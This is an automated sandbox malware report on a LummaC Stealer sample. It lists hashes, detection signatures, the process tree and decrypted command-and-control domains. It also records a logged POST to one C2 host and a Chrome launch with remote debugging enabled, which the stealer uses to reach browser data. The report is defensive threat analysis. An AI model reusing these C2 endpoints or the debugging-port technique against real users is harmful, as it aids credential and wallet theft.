Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Malware.zip

Overview

General Information

Sample name:Malware.zip
Analysis ID:1634564
MD5:b48d83e332b091b2f8556ce414d02528
SHA1:77ce378b412ffaaac214a1ac80fe491ef495d69c
SHA256:3a44c0cf9db5c5130555a0d8e03893cf701e9145b98c0d469ca8b2b00d70fcd2
Infos:

Detection

LummaC Stealer
Score:76
Range:0 - 100
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Creates a process in suspended mode (likely to inject code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64_ra
  • rundll32.exe (PID: 3088 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • OpenWith.exe (PID: 6400 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • Setup.exe (PID: 6556 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe" MD5: E1DF45DCA577E2C5941E714A0F9C32EC)
    • chrome.exe (PID: 6872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2380,i,11729313136857741515,7979103794442491089,262144 --variations-seed-version --mojo-platform-channel-handle=2548 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      Process Memory Space: Setup.exe PID: 6556JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        Sigma detected: Browser Started with Remote Debugging
        Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe, ParentProcessId: 6556, ParentProcessName: Setup.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223, ProcessId: 6872, ProcessName: chrome.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-11T00:42:37.600801+010020283713Unknown Traffic192.168.2.1649701149.154.167.99443TCP
        2025-03-11T00:42:39.657690+010020283713Unknown Traffic192.168.2.1649702104.21.11.150443TCP
        2025-03-11T00:42:41.315049+010020283713Unknown Traffic192.168.2.1649703104.21.11.150443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Sample uses string decryption to hide its real strings
        Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpString decryptor: restfulzpillow.bet/bWij
        Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpString decryptor: featureccus.shop/bdMAn
        Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
        Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
        Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
        Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
        Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
        Source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.16:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.150:443 -> 192.168.2.16:49703 version: TLS 1.2
        Source: global trafficHTTP traffic detected: GET /owowoowokk3j4 HTTP/1.1Connection: Keep-AliveHost: t.me
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49703 -> 104.21.11.150:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49702 -> 104.21.11.150:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49701 -> 149.154.167.99:443
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /owowoowokk3j4 HTTP/1.1Connection: Keep-AliveHost: t.me
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000003.1901191625.000069140159D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901318814.0000691400333000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
        Source: chrome.exe, 0000000D.00000003.1901191625.000069140159D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901318814.0000691400333000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3||(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
        Source: chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: t.me
        Source: global trafficDNS traffic detected: DNS query: restfulzpillow.bet
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: apis.google.com
        Source: global trafficDNS traffic detected: DNS query: play.google.com
        Source: unknownHTTP traffic detected: POST /bWij HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: restfulzpillow.bet
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
        Source: chrome.exe, 0000000D.00000002.2576136209.0000691400804000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
        Source: chrome.exe, 0000000D.00000002.2598698110.0000691401150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
        Source: chrome.exe, 0000000D.00000002.2562242297.000069140008E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://google.com/
        Source: chrome.exe, 0000000D.00000002.2537616209.000001B008EE7000.00000004.10000000.00040000.00000000.sdmp, chrome.exe, 0000000D.00000002.2614450632.0000691401940000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2565362454.00006914001B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
        Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
        Source: chromecache_69.14.drString found in binary or memory: http://www.broofa.com
        Source: chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
        Source: chrome.exe, 0000000D.00000002.2493174113.000001B005E26000.00000002.00000001.00040000.0000000E.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
        Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.2561754247.0000691400038000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
        Source: chrome.exe, 0000000D.00000002.2575961680.00006914007F0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2574197738.0000691400798000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2598698110.0000691401150000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2614629718.0000691401954000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2614629718.0000691401954000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AccountChooser
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
        Source: chrome.exe, 0000000D.00000003.1900222913.00006914004B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
        Source: chrome.exe, 0000000D.00000002.2562242297.0000691400068000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
        Source: chrome.exe, 0000000D.00000002.2562242297.0000691400068000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABata
        Source: chromecache_67.14.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
        Source: chromecache_67.14.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/samlredirect
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
        Source: chrome.exe, 0000000D.00000002.2574197738.0000691400798000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmp, chromecache_67.14.dr, chromecache_69.14.drString found in binary or memory: https://apis.google.com
        Source: chrome.exe, 0000000D.00000002.2586132880.0000691400C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
        Source: chrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1931768505.000069140158E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
        Source: chrome.exe, 0000000D.00000002.2588586779.0000691400D14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611576402.0000691401818000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2584968778.0000691400B94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://chrome.google.com/webstore/category/extensions
